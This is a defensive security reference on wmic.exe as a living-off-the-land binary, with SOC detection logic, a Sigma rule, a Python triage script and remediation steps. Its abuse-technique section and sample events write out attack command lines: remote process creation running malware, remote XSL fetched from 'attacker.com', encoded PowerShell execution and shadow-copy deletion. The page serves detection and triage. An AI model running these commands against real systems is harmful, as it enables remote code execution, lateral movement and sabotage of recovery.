wmic.exe (System Utility) - WMI Command Line Security Analysis
wmic.exe is the WMI command-line interface providing access to Windows Management Instrumentation. It is a powerful LOLBin used for remote code execution, lateral movement, reconnaissance, and defense evasion. While deprecated, wmic.exe remains highly abused in attack chains.
Risk Summary
CRITICAL priority for SOC triage. wmic.exe is a versatile LOLBin for execution, recon, and lateral movement. Commands like "process call create", "node:", and XSL execution are **strong indicators of malicious activity**. Note: Deprecated but still present on most systems.
Overview
What is wmic.exe?
wmic.exe is the command-line interface for Windows Management Instrumentation.
Core Functions
WMI Operations:
- System information queries
- Process management
- Remote system management
- Hardware/software inventory
Security Significance
- LOLBin Status: Extensive abuse capabilities
- Remote Execution: Execute code on remote systems
- Recon Tool: System enumeration
- Deprecated: Still present, still abused
Note: wmic.exe is deprecated in Windows 10 21H1+
Normal Behavior
Expected Process State
| Property | Expected Value |
|---|---|
| Path | C:\Windows\System32\wbem\WMIC.exe |
| Parent | cmd.exe, powershell.exe |
| User | Administrator |
| Context | System administration |
Legitimate Usage
wmic os get caption
wmic computersystem get model
Common Locations
C:\Windows\System32\wbem\WMIC.exe
C:\Windows\SysWOW64\wbem\WMIC.exe
Suspicious Indicators
Legitimate vs Suspicious
| | LEGITIMATE | SUSPICIOUS |
|---|---|---|
| Command | wmic os get caption; wmic computersystem list | wmic process call create "cmd /c ..."; wmic /node:TARGET ...; wmic os get /format:xsl |
| Context | System inventory | Process creation; remote execution; XSL stylesheet abuse |
High-Risk Commands
| Command | Risk | Purpose |
|---|---|---|
| process call create | CRITICAL | Execute code |
| /node: | CRITICAL | Remote execution |
| /format: (XSL) | CRITICAL | Code execution |
| shadowcopy delete | HIGH | Ransomware indicator |
Abuse Techniques
Attack Techniques
Technique #1: Local Process Creation (T1047)
wmic process call create "powershell -ep bypass -c IEX(...)"
Technique #2: Remote Execution (T1047)
wmic /node:TARGET /user:admin /password:pass process call create "cmd /c C:\malware.exe"
Technique #3: XSL Script Execution (T1220)
wmic os get /format:"http://attacker.com/malicious.xsl"
Technique #4: Reconnaissance (T1082)
wmic qfe list
wmic product get name
wmic useraccount list
Technique #5: Defense Evasion (T1490)
wmic shadowcopy delete
Detection Guidance
Detection Strategies
Priority #1: Process Creation
Process = "wmic.exe" AND
CommandLine CONTAINS "process call create"
→ ALERT: CRITICAL
Priority #2: Remote Node
Process = "wmic.exe" AND
CommandLine CONTAINS "/node:"
→ ALERT: CRITICAL - Remote WMI execution
Priority #3: XSL Abuse
Process = "wmic.exe" AND
CommandLine CONTAINS "/format:" AND
CommandLine CONTAINS ["http", ".xsl"]
→ ALERT: CRITICAL - XSL script execution
Sigma Rule:
```yaml
title: WMIC Remote Process Creation
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    Image|endswith: '\WMIC.exe'
    CommandLine|contains|all:
      - '/node:'
      - 'process'
      - 'call'
      - 'create'
  condition: selection
level: critical
```
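To show how the three detection priorities and the Sigma rule above behave on real-looking telemetry, here is an added Python example (not code from the original page) that applies them to constructed process-creation records; the host name, paths and command lines in the samples are made up.

```python
"""Triage wmic.exe process-creation events against the priorities above.
Added example; the records below are constructed to resemble the Image and
CommandLine fields of Sysmon Event ID 1 / Security 4688."""
import re

# Constructed sample events (hostnames and paths are made up).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic os get caption"},                       # benign inventory
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": 'wmic process call create "cmd /c whoami"'},  # Priority #1
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic /node:FILESRV01 /user:admin process  call create notepad.exe"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": 'wmic os get /format:"http://example.invalid/x.xsl"'},  # Priority #3
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": "wmic shadowcopy delete"},                    # shadowcopy delete
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd /c echo process call create"},           # not wmic: no alert
]

def triage(event):
    """Return (level, reason) for one event; ('NONE', '') when nothing matches."""
    if not event["Image"].lower().endswith(r"\wmic.exe"):
        return ("NONE", "")
    # Lower-case and collapse whitespace so 'process  call create' still matches.
    cl = re.sub(r"\s+", " ", event["CommandLine"].lower())
    remote = "/node:" in cl                       # Priority #2 / Sigma rule
    if "process call create" in cl:               # Priority #1 (+ Sigma when remote)
        return ("CRITICAL", "remote WMI process creation" if remote
                else "WMI process creation")
    if remote:
        return ("CRITICAL", "remote WMI execution")
    if "/format:" in cl and ("http" in cl or ".xsl" in cl):   # Priority #3
        return ("CRITICAL", "XSL script execution")
    if "shadowcopy" in cl and "delete" in cl:     # HIGH-risk command from the table
        return ("HIGH", "shadow copy deletion")
    return ("NONE", "")

def triage_all(events=SAMPLE_EVENTS):
    """Triage every event; returns a list of (level, reason) in input order."""
    return [triage(e) for e in events]

if __name__ == "__main__":
    for e, (level, reason) in zip(SAMPLE_EVENTS, triage_all()):
        print(f"{level:8} {reason:28} {e['CommandLine']}")
```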
Remediation Steps
Protection and Remediation
Defense: Disable WMIC
Remove wmic.exe (deprecated anyway):
dism /Online /Remove-Capability /CapabilityName:WMIC~~~~
Defense: Monitor WMI
Enable WMI activity logging.
If Compromise Suspected
- Review wmic command line
- Check for remote connections
- Identify created processes
- Hunt for lateral movement
- Check shadow copies status
Investigation Checklist
- Review full command line
- Check for process creation
- Identify remote targets
- Check for XSL references
- Review spawned processes
- Check shadow copy status
- Hunt for lateral movement